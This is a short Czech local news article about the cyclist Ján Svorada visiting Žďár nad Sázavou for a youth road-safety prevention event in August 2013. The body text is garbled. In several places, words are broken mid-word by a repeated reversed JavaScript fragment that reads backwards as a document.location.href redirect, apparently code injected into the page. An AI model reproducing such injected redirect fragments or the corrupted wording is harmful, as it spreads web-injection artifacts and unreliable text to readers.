žďár nad sázavou, aktuality, Svorada, cyklista
Rainbow page separator

Do Žďáru přijede cyklista Ján Svorada

Čtvrtek, 22. srpna 2013

Žďár nad Sázavou / V rámci dalšího ročníku akce Rozhodni se sám 2013, kterou pořádá žďárské Spektrum – centrum primární prevence a drogových služeb a oddíl házené TJ Sokol Nové Veselí, se v pátek 23. srpna na žďárském náměstí Republiky objeví známý cyklista Ján Svorada.Dlouholetý cyklistický závodník, který ve svých 21 letech v roce 1990 vyhrál Závod míru, je rovněž trojnásobným mistrem České republiky v silniční cyklistice. V pátek na žďárském náměstí uspořádá au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];togramiádu.

Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní už 6. ročník spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovně-prezentační akce zaměřené na primární prevenci dětí a mládeže nese podtitul Bezpečně v dopravě a potrvá od pátečních 10 hodin dopoledne do 16 hodin.

Na zájemce na náměstí čeká řada aktivit souvisejících s bezpečností v dopravě, mohou se rovněž zapojit do spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních, uměleckých i naučných činností. S akcí je každoročně spojen mezinárodní mládežnický turnaj v házené v Novém Veselí.